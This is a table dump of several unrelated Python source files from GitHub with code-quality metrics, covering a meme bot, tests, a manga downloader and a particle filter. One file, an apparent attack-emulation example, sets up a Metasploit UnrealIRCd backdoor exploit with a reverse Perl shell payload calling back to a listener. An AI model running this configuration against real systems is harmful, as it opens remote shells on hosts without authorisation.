hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e86aaa563073dbb7b8cafea3ea50f5fd2ee8e954 | 2,081 | py | Python | meme_publisher.py | MrUpyachka/bothometh | f806a3d711efe03c49833effdb7e152dda0dbeb9 | [
"Apache-2.0"
] | 1 | 2021-03-06T17:20:12.000Z | 2021-03-06T17:20:12.000Z | meme_publisher.py | MrUpyachka/bothometh | f806a3d711efe03c49833effdb7e152dda0dbeb9 | [
"Apache-2.0"
] | 2 | 2021-03-06T16:48:00.000Z | 2021-03-06T16:51:55.000Z | meme_publisher.py | MrUpyachka/bothometh | f806a3d711efe03c49833effdb7e152dda0dbeb9 | [
"Apache-2.0"
] | null | null | null | import random
import praw
from telebot.types import InlineKeyboardMarkup, InlineKeyboardButton
import logger
LOG = logger.LOG
QUERY_PREFIX = 'meme '
class MemePublisher:
def __init__(self, reddit_client_id, reddit_client_secret, reddit_client_user_agent, settings):
self.reddit = praw.Reddit(client_id=reddit_client_id,
client_secret=reddit_client_secret,
user_agent=reddit_client_user_agent)
self.topic = settings['topic']
self.queries = settings['queries']
self.memes_cache = {}
def refresh_memes(self, query):
LOG.info("No more memes, getting new ones...")
sub_reddit = self.reddit.subreddit(self.topic) \
.search(query, sort="top", limit=200)
loaded_memes = list(sub_reddit)
if len(loaded_memes) == 0:
LOG.info("No memes found")
self.memes_cache[query] = loaded_memes
else:
LOG.info("Got %s memes", len(loaded_memes))
random.shuffle(loaded_memes)
self.memes_cache[query] = loaded_memes
return loaded_memes
def get_query_memes_cache(self, query):
if query in self.memes_cache:
return self.memes_cache[query]
return self.refresh_memes(query)
def get_reddit_meme(self, query):
query_memes_cache = self.get_query_memes_cache(query)
meme = query_memes_cache.pop()
if meme is None:
return None
else:
_ = meme.preview
result = {
"code": 200,
"post_link": meme.shortlink,
"subreddit": self.topic,
"title": meme.title,
"url": meme.url,
"ups": meme.ups,
}
return result
def queries_markup(self):
result = InlineKeyboardMarkup()
result.row_width = len(self.queries)
for query in self.queries:
result.add(InlineKeyboardButton(query, callback_data=QUERY_PREFIX + query))
return result
| 33.031746 | 99 | 0.59827 | 235 | 2,081 | 5.059574 | 0.319149 | 0.075694 | 0.058873 | 0.047939 | 0.094197 | 0.050463 | 0 | 0 | 0 | 0 | 0 | 0.004895 | 0.31283 | 2,081 | 62 | 100 | 33.564516 | 0.826573 | 0 | 0 | 0.113208 | 0 | 0 | 0.054301 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.09434 | false | 0 | 0.075472 | 0 | 0.301887 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e86b225d9ee3942dac0a65af13306dbf88fb85f5 | 3,352 | py | Python | tests/dialects/test_elasticsearch.py | nazrulworld/fhirpath | 3b819870c57a0befcac18916a4d03b64c0e202ca | [
"Apache-2.0"
] | 25 | 2019-05-14T13:35:32.000Z | 2022-02-21T23:03:35.000Z | tests/dialects/test_elasticsearch.py | nazrulworld/fhirpath | 3b819870c57a0befcac18916a4d03b64c0e202ca | [
"Apache-2.0"
] | 29 | 2020-02-14T08:14:02.000Z | 2021-02-23T20:14:42.000Z | tests/dialects/test_elasticsearch.py | nazrulworld/fhirpath | 3b819870c57a0befcac18916a4d03b64c0e202ca | [
"Apache-2.0"
] | 4 | 2020-06-30T08:05:54.000Z | 2021-08-09T19:10:35.000Z | #!/usr/bin/env python
# _*_ coding: utf-8 _*_
"""Tests for `fhirpath` package."""
from fhirpath.search import Search
from fhirpath.search import SearchContext
__author__ = "Md Nazrul Islam<email2nazrul@gmail.com>"
async def test_raw_es_query_generation_from_search(engine, es_data):
"""Sample pytest test function with the pytest fixture as an argument."""
context = SearchContext(engine, "Patient")
params = (("gender", "male"), ("active", "true"), ("birthdate", "ge2010-01-01"))
fhir_search = Search(context, params=params)
result = fhir_search.build()
engine.dialect.compile(
result._query,
calculate_field_index_name=engine.calculate_field_index_name,
get_mapping=engine.get_mapping,
)
async def test_dialect_generated_raw_query(es_data, engine):
""" """
search_context = SearchContext(engine, "Organization")
params = (
("active", "true"),
("_lastUpdated", "2010-05-28T05:35:56+00:00"),
("_profile", "http://hl7.org/fhir/Organization"),
("identifier", "urn:oid:2.16.528.1|91654"),
("type", "http://hl7.org/fhir/organization-type|prov"),
("address-postalcode", "9100 AA"),
("address", "Den Burg"),
)
search_tool = Search(context=search_context, params=params)
result_query = search_tool.build()
compiled = search_context.engine.dialect.compile(
result_query._query,
calculate_field_index_name=engine.calculate_field_index_name,
get_mapping=engine.get_mapping,
)
search_params = search_context.engine.connection.finalize_search_params(compiled)
conn = engine.connection.raw_connection
index_name = engine.get_index_name()
result = conn.search(index=index_name, **search_params)
assert len(result["hits"]["hits"]) == 1
# test ContactPoint,HumanName
search_context = SearchContext(engine, "Patient")
params = (
("active", "true"),
("telecom", "2562000002"),
("given", "Eelector"),
("name", "Saint"),
("email", "demo1@example.com"),
("phone", "2562000002"),
("given:exact", "Eelector"),
)
search_tool = Search(context=search_context, params=params)
result_query = search_tool.build()
compiled = search_context.engine.dialect.compile(
result_query._query,
calculate_field_index_name=engine.calculate_field_index_name,
get_mapping=engine.get_mapping,
)
search_params = search_context.engine.connection.finalize_search_params(compiled)
result = conn.search(index=index_name, **search_params)
assert len(result["hits"]["hits"]) == 1
# test Quantity, Number
search_context = SearchContext(engine, "ChargeItem")
params = (
("quantity", "1"),
("factor-override", "0.8"),
("price-override", "40|EUR"),
)
search_tool = Search(context=search_context, params=params)
result_query = search_tool.build()
compiled = search_context.engine.dialect.compile(
result_query._query,
calculate_field_index_name=engine.calculate_field_index_name,
get_mapping=engine.get_mapping,
)
search_params = search_context.engine.connection.finalize_search_params(compiled)
result = conn.search(index=index_name, **search_params)
assert len(result["hits"]["hits"]) == 1
| 34.916667 | 85 | 0.673329 | 384 | 3,352 | 5.609375 | 0.309896 | 0.096565 | 0.070566 | 0.085422 | 0.608171 | 0.521356 | 0.521356 | 0.521356 | 0.521356 | 0.521356 | 0 | 0.027584 | 0.188842 | 3,352 | 95 | 86 | 35.284211 | 0.764619 | 0.036396 | 0 | 0.472222 | 0 | 0 | 0.158867 | 0.024833 | 0 | 0 | 0 | 0 | 0.041667 | 1 | 0 | false | 0 | 0.027778 | 0 | 0.027778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e86be22c436cbbd53ee259d110b7ee833f5b7916 | 1,327 | py | Python | Fig5_grid/src_2comp/create_1Dtrack_network_random.py | TatsuyaHaga/preplaymodel_codes | 548df9ef5f85358fb03ed5f7f4cdc9e03a04bbf3 | [
"MIT"
] | 1 | 2019-02-26T04:15:16.000Z | 2019-02-26T04:15:16.000Z | Fig5_grid/src_2comp/create_1Dtrack_network_random.py | TatsuyaHaga/preplaymodel_codes | 548df9ef5f85358fb03ed5f7f4cdc9e03a04bbf3 | [
"MIT"
] | null | null | null | Fig5_grid/src_2comp/create_1Dtrack_network_random.py | TatsuyaHaga/preplaymodel_codes | 548df9ef5f85358fb03ed5f7f4cdc9e03a04bbf3 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
from shared_setting import *
import numpy
import csv
#soma exc synapse
EEmax=18.0
EEwidth=5.0
EEdistalmax=2.0
w_rand=0.0
#som<-som
x=numpy.arange(NE)
y=numpy.arange(NE)
z=numpy.meshgrid(x,y)
dif=numpy.abs(z[1]-z[0])
#dif=numpy.minimum(dif,NE-dif) #ring
WEE=EEmax*numpy.exp(-0.5*(dif/EEwidth)**2)+w_rand*numpy.random.randn(NE, NE)
WEE[WEE<0.0]=0.0
WEE[numpy.eye(NE, dtype=bool)]=0.0
numpy.savetxt("WEEsom_init.csv", WEE, delimiter=",")
#dnd<-input
WEE=EEdistalmax*numpy.random.rand(NE, Ninput)
numpy.savetxt("WEEdnd_init.csv", WEE, delimiter=",")
#inh connection
WEIsom_init=4.0
WEIdnd_init=0.0
WEIsom=numpy.random.rand(NE, Nsominh)
WEIsom=WEIsom_init*WEIsom/numpy.mean(WEIsom, axis=1, keepdims=True)
numpy.savetxt("WEIsom_init.csv", WEIsom, delimiter=",")
WEIdnd=numpy.random.rand(NE, Ndndinh)
WEIdnd=WEIdnd_init*WEIdnd/numpy.mean(WEIdnd, axis=1, keepdims=True)
numpy.savetxt("WEIdnd_init.csv", WEIdnd, delimiter=",")
WIEsom_init=1.0/Nsominh
WIEdnd_init=1.0/Ndndinh
WIEsom=numpy.random.rand(Nsominh, NE)
WIEsom=WIEsom_init*WIEsom/numpy.mean(WIEsom, axis=0, keepdims=True)
numpy.savetxt("WIEsom_init.csv", WIEsom, delimiter=",")
WIEdnd=numpy.random.rand(Ndndinh, NE)
WIEdnd=WIEdnd_init*WIEdnd/numpy.mean(WIEdnd, axis=0, keepdims=True)
numpy.savetxt("WIEdnd_init.csv", WIEdnd, delimiter=",")
| 24.574074 | 76 | 0.751319 | 226 | 1,327 | 4.336283 | 0.274336 | 0.012245 | 0.076531 | 0.097959 | 0.118367 | 0.118367 | 0 | 0 | 0 | 0 | 0 | 0.026677 | 0.067822 | 1,327 | 53 | 77 | 25.037736 | 0.765562 | 0.077619 | 0 | 0 | 0 | 0 | 0.078947 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.090909 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e87073f10682fe75475293de22e06d5ee8edf907 | 3,399 | py | Python | cli.py | amshelhack3r/MangaDownloader | 936b8e7d12085da023b9413a80226f88f3e982b8 | [
"MIT"
] | 1 | 2019-11-26T14:34:31.000Z | 2019-11-26T14:34:31.000Z | cli.py | amshelhack3r/MangaDownloader | 936b8e7d12085da023b9413a80226f88f3e982b8 | [
"MIT"
] | null | null | null | cli.py | amshelhack3r/MangaDownloader | 936b8e7d12085da023b9413a80226f88f3e982b8 | [
"MIT"
] | null | null | null | import os, sys
from pprint import pprint, pformat
from PyInquirer import prompt
from examples import custom_style_1
from scraper import Scraper
from downloader import Downloader
import logging
logging.basicConfig(filename='app.log', filemode='w', format='%(asctime)s - %(message)s', level=logging.INFO)
class cli():
def __init__(self):
print('Welcome to manga downloader')
# check if the user has
if not os.path.exists('.env'):
self.first_launch()
self.manga_obj = dict()
self.chaptersToDownload()
pass
def first_launch(self):
basedir = os.environ.get('HOME')
# windows system
if basedir is None:
basedir = os.environ.get('HOMEPATH')
with open('.env', 'w') as f:
data = 'DOWNLOAD='+basedir+"/Manga"
f.write(data)
return True
def searchManga(self):
questions = [
{
'type': 'input',
'name': 'manga',
'message': 'Enter the name of the manga you want to download?'
},
]
obj = prompt(questions, style=custom_style_1)
self.manga_obj['typed_name'] = obj.get('manga')
def searchResults(self):
self.searchManga()
manga_name = self.manga_obj.get('typed_name')
choices = Scraper.getSearchResults(manga_name)
if len(choices) < 1:
print("MANGA NOT FOUND")
sys.exit()
questions = [
{
'type': 'list',
'name': 'manga',
'message': 'Search Results',
'choices': choices.keys()
},
]
obj = prompt(questions, style=custom_style_1)
self.manga_obj['manga'] = obj.get('manga')
self.manga_obj['link'] = choices.get(obj['manga'])
self.manga_obj['url_name'] = cli.getName(self.manga_obj.get('link'))
def chaptersToDownload(self):
self.searchResults()
chapters = Scraper.getMangaInfo(self.manga_obj.get('url_name'))
self.manga_obj['total'] = chapters.get('count')
print('{} has {} chapters'.format(self.manga_obj.get('manga'), self.manga_obj.get('total')))
questions = [
{
'type': 'input',
'name': 'chapters',
'message': 'Which Chapters you want to download? ie 1 or 1-7 or all'
},
]
obj = prompt(questions, style=custom_style_1)
self.fetchChapters(obj.get('chapters'))
pass
def fetchChapters(self, chapters):
if chapters.isnumeric():
self.manga_obj['chapters'] = int(chapters)
elif chapters.isalpha():
self.manga_obj['chapters'] = range(1, self.manga_obj.get('total'))
elif len(chapters.split('-')) > 1:
lst = [int(i) for i in chapters.split('-')]
self.manga_obj['chapters'] = range(lst[0], lst[1]+1)
else:
print('invalid input')
return
logging.info(pformat(self.manga_obj))
Downloader(self.manga_obj)
pass
@classmethod
def getName(cls, url):
url_list = url.split('/')
last_index = 0
if len(url_list) > 0:
last_index = len(url_list) - 1
return url_list[last_index]
| 30.348214 | 109 | 0.542513 | 377 | 3,399 | 4.774536 | 0.31565 | 0.08 | 0.113333 | 0.05 | 0.148333 | 0.105 | 0.105 | 0.073889 | 0.052222 | 0.052222 | 0 | 0.007014 | 0.32892 | 3,399 | 111 | 110 | 30.621622 | 0.782113 | 0.010886 | 0 | 0.146067 | 0 | 0 | 0.139327 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.078652 | false | 0.033708 | 0.078652 | 0 | 0.202247 | 0.05618 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e87082df3e5ea0f0393354ac8dec7a95e15880ea | 3,020 | py | Python | plaidml/settings_test.py | redoclag/plaidml | 46d9e8b3f1e1093aab2a0dfa40b2e15e3cc7d314 | [
"Apache-2.0"
] | 4,535 | 2017-10-20T05:03:57.000Z | 2022-03-30T15:42:33.000Z | plaidml/settings_test.py | HOZHENWAI/plaidml | 46d9e8b3f1e1093aab2a0dfa40b2e15e3cc7d314 | [
"Apache-2.0"
] | 984 | 2017-10-20T17:16:09.000Z | 2022-03-30T05:43:18.000Z | plaidml/settings_test.py | HOZHENWAI/plaidml | 46d9e8b3f1e1093aab2a0dfa40b2e15e3cc7d314 | [
"Apache-2.0"
] | 492 | 2017-10-20T18:22:32.000Z | 2022-03-30T09:00:05.000Z | from __future__ import print_function
import os
import tempfile
import unittest
import uuid
import plaidml.exceptions
from plaidml import settings
VALID_CONF = r'''{
"PLAIDML_CONFIG": "tmp",
"PLAIDML_CONFIG_FILE": "/tmp",
"PLAIDML_DEVICE_IDS": ["1", "3", "5"],
"PLAIDML_EXPERIMENTAL": true,
"PLAIDML_TELEMETRY": true
}
'''
INVALID_CONF = '{"PLAIDML_INVALID":"1"}'
class TestSettings(unittest.TestCase):
def setUp(self):
settings._setup_for_test()
def testDefaults(self):
self.assertEquals(settings.config, None)
self.assertEquals(settings.device_ids, [])
self.assertEquals(settings.experimental, False)
self.assertEquals(settings.session, None)
def testSetting(self):
settings.config = 'test'
settings.device_ids = ['1', '2']
settings.experimental = True
settings.session = "123"
self.assertEquals(settings.config, 'test')
self.assertEquals(settings.device_ids, ['1', '2'])
self.assertEquals(settings.experimental, True)
self.assertEquals(settings.session, "123")
def testStartSession(self):
with self.assertRaises(plaidml.exceptions.PlaidMLError):
settings.start_session()
settings.setup = True
settings.start_session()
settings._setup_for_test()
settings.setup = False
with self.assertRaises(plaidml.exceptions.PlaidMLError):
settings.start_session()
settings._setup_for_test()
settings.experimental = True
settings.start_session()
u = uuid.UUID(settings.session)
def testSettingsFileLoading(self):
with tempfile.NamedTemporaryFile(mode='w', delete=False) as val:
val.write(VALID_CONF)
with tempfile.NamedTemporaryFile(mode='w', delete=False) as inv:
inv.write(INVALID_CONF)
# Explicit settings files should take precedence
settings._setup_for_test(inv.name, inv.name)
os.environ['PLAIDML_SETTINGS'] = val.name
settings._load()
self.assertEquals(settings.config, 'tmp')
self.assertEquals(settings.experimental, True)
self.assertEquals(settings.device_ids, ['1', '3', '5'])
# User config should shadow system config
settings._setup_for_test(val.name, inv.name)
settings._load()
self.assertEquals(settings.experimental, True)
settings._setup_for_test('nottafile', inv.name)
with self.assertRaises(plaidml.exceptions.OutOfRange):
settings._load()
os.remove(val.name)
os.remove(inv.name)
def testSettingsOverridesLoading(self):
with tempfile.NamedTemporaryFile(mode='w', delete=False) as tf:
tf.write(VALID_CONF)
os.environ['PLAIDML_SETTINGS'] = tf.name
os.environ['PLAIDML_CONFIG'] = 'other'
settings._load()
self.assertEquals(settings.config, 'other')
os.remove(tf.name)
if __name__ == '__main__':
unittest.main()
| 32.826087 | 72 | 0.658278 | 325 | 3,020 | 5.935385 | 0.236923 | 0.107828 | 0.161742 | 0.062208 | 0.414204 | 0.351996 | 0.26283 | 0.26283 | 0.138932 | 0.085018 | 0 | 0.007277 | 0.22649 | 3,020 | 91 | 73 | 33.186813 | 0.818493 | 0.028477 | 0 | 0.24 | 0 | 0 | 0.101672 | 0.030365 | 0 | 0 | 0 | 0 | 0.213333 | 1 | 0.08 | false | 0 | 0.093333 | 0 | 0.186667 | 0.013333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e870ac8178b0ee06b224d12e437fdb0f59fbde3f | 965 | py | Python | modules/mod_msf_module/example_with_payload.py | slashsec-edu/cryton-modules | 4826b5e353f64e3d915d2abaead93b234a296304 | [
"MIT"
] | null | null | null | modules/mod_msf_module/example_with_payload.py | slashsec-edu/cryton-modules | 4826b5e353f64e3d915d2abaead93b234a296304 | [
"MIT"
] | null | null | null | modules/mod_msf_module/example_with_payload.py | slashsec-edu/cryton-modules | 4826b5e353f64e3d915d2abaead93b234a296304 | [
"MIT"
] | null | null | null | from mod import execute, validate
args = {
"module_type": "exploit",
"module_name": "unix/irc/unreal_ircd_3281_backdoor",
"module_options":
{
"RHOSTS": "172.28.128.99",
"RPORT": "6697"
},
"payload_name": "cmd/unix/reverse_perl", # optional
"payload_options": # optional
{
"LHOST": "172.28.128.3",
"LPORT": "4444"
},
"run_as_job": False, # optional
# "session_id": "1", # optional
"create_named_session": "some_name", # optional
"exploit_timeout_in_sec": 30, # default 60
"exploit_retries": 3, # default 1
"session_timeout_in_sec": 10, # default 60
}
try:
val_output = validate(args)
print("validate output: " + str(val_output))
except Exception as ex:
print(ex)
try:
ex_output = execute(args)
print("execute output: " + str(ex_output))
except Exception as ex:
print(ex)
| 26.805556 | 56 | 0.567876 | 111 | 965 | 4.702703 | 0.531532 | 0.045977 | 0.030651 | 0.088123 | 0.122605 | 0.122605 | 0.122605 | 0 | 0 | 0 | 0 | 0.061674 | 0.294301 | 965 | 35 | 57 | 27.571429 | 0.704846 | 0.109845 | 0 | 0.193548 | 0 | 0 | 0.365135 | 0.116608 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.032258 | 0 | 0.032258 | 0.129032 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8724a1db22a26938206e9c01a2bdbc830a7a858 | 2,073 | py | Python | jupyterlab_dvc/tests/test_status.py | SiddharthPant/jupyterlab-dvc | 084a0f03dcbfe6e58c783381f609bfe6c33bc10d | [
"BSD-3-Clause"
] | 2 | 2020-06-30T05:05:46.000Z | 2021-08-12T06:28:05.000Z | jupyterlab_dvc/tests/test_status.py | SiddharthPant/jupyterlab-dvc | 084a0f03dcbfe6e58c783381f609bfe6c33bc10d | [
"BSD-3-Clause"
] | 1 | 2021-05-11T12:21:01.000Z | 2021-05-11T12:21:01.000Z | jupyterlab_dvc/tests/test_status.py | SiddharthPant/jupyterlab-dvc | 084a0f03dcbfe6e58c783381f609bfe6c33bc10d | [
"BSD-3-Clause"
] | null | null | null | # python lib
import os
from unittest.mock import Mock, call, patch
import pytest
import tornado
# local lib
from jupyterlab_dvc.git import Git
from .testutils import FakeContentManager
@pytest.mark.asyncio
@pytest.mark.parametrize(
"output,expected",
[
(
(
"A notebook with spaces.ipynb",
"M notebook with λ.ipynb",
"R renamed_to_θ.py",
"originally_named_π.py",
"?? untracked.ipynb",
),
[
{
"x": "A",
"y": " ",
"to": "notebook with spaces.ipynb",
"from": "notebook with spaces.ipynb",
},
{
"x": "M",
"y": " ",
"to": "notebook with λ.ipynb",
"from": "notebook with λ.ipynb",
},
{
"x": "R",
"y": " ",
"to": "renamed_to_θ.py",
"from": "originally_named_π.py",
},
{
"x": "?",
"y": "?",
"to": "untracked.ipynb",
"from": "untracked.ipynb",
},
],
),
((""), ([])), # Empty answer
],
)
async def test_status(output, expected):
with patch("jupyterlab_dvc.git.execute") as mock_execute:
# Given
root = "/bin"
repository = "test_curr_path"
mock_execute.return_value = tornado.gen.maybe_future(
(0, "\x00".join(output)+"\x00", "")
)
# When
actual_response = await Git(FakeContentManager(root)).status(
current_path=repository
)
# Then
mock_execute.assert_called_once_with(
["git", "status", "--porcelain", "-u", "-z"],
cwd=os.path.join(root, repository),
)
assert {"code": 0, "files": expected} == actual_response
| 26.922078 | 69 | 0.418234 | 176 | 2,073 | 4.789773 | 0.4375 | 0.085409 | 0.064057 | 0.081851 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00524 | 0.44766 | 2,073 | 76 | 70 | 27.276316 | 0.731004 | 0.023637 | 0 | 0.111111 | 0 | 0 | 0.203272 | 0.033713 | 0 | 0 | 0 | 0 | 0.031746 | 1 | 0 | false | 0 | 0.095238 | 0 | 0.095238 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e872ae3834e819f8cbdad94db0c72a6ba0a16ae2 | 3,632 | py | Python | PFlib/wplyw_metody_probkowania.py | Rogue05/Praca-Magisterska | 863a0522348eddd093b4de05d12c788ef5f2f520 | [
"MIT"
] | null | null | null | PFlib/wplyw_metody_probkowania.py | Rogue05/Praca-Magisterska | 863a0522348eddd093b4de05d12c788ef5f2f520 | [
"MIT"
] | null | null | null | PFlib/wplyw_metody_probkowania.py | Rogue05/Praca-Magisterska | 863a0522348eddd093b4de05d12c788ef5f2f520 | [
"MIT"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt
import PFlib as pf
map_size = 1000
# pop_size = 10000
d_vel = 0.1
d_ori = 0.3
vel = 11
#================================
mapa = pf.PrimitiveMap(map_size)
mapa.add_line(-1,1,800)
mapa.add_circle(1000,1000,300)
mapa.add_circle(200,0,300)
mapa.add_circle(200,700,100)
mapa.add_circle(800,400,60)
def get_err(sus=True, pop_size = 1000, limit = 300, random_walker=False):
pop = pf.get_random_pop(mapa,pop_size)
weights = pf.get_uniform_weights(pop_size)
real_state = pf.robot_2d(500, 500, 0, vel)
#================================
diffx = []
diffy = []
popss = [pop_size,]
oriss = [real_state.ori,]
for i in range(limit):
# if not plt.fignum_exists(fig.number):
# break
nori = 0.1
if random_walker:
nori = np.random.uniform(-.1,.1)
pf.drift_state(mapa, real_state, nori, 0.0)
pf.drift_pop(mapa, pop, nori, 0.0, d_ori, d_vel)
meas = mapa.get_meas(real_state.x, real_state.y, real_state.ori)
weights = pf.update_weights(mapa,meas, pop, weights)
est_state = pf.get_est(pop,weights)
# print(' e' ,i,est_state.x,est_state.y,est_state.ori,est_state.vel)
# if i > 100:
diffx.append(real_state.x-est_state.x)
diffy.append(real_state.y-est_state.y)
effN = 1/(weights**2).sum()
if effN < 0.8*pop_size:
# print(i,'resample',pop_size,effN,flush=True)
alpha = 100
# pop_size = pf.get_new_N(mapa, pop, weights, meas, alpha)
popss.append(pop_size)
oriss.append(real_state.ori)
if sus:
pop = pf.sus_resample(pop, weights, pop_size)
else:
pop = pf.roulette_wheel_resample(pop, weights, pop_size)
weights = pf.get_uniform_weights(pop_size)
# plt.plot(pop)
return np.sqrt(np.array(diffx)**2+np.array(diffy)**2)/vel
# plt.plot(diffx,label='$x_{{err}}$')
# plt.plot(diffy,label='$y_{{err}}$')
for N in [100,300,1000]:
avgs = 100
sus = np.zeros(300)
for a in range(avgs):
print('sus',a,N)
sus += get_err(True, pop_size=N)
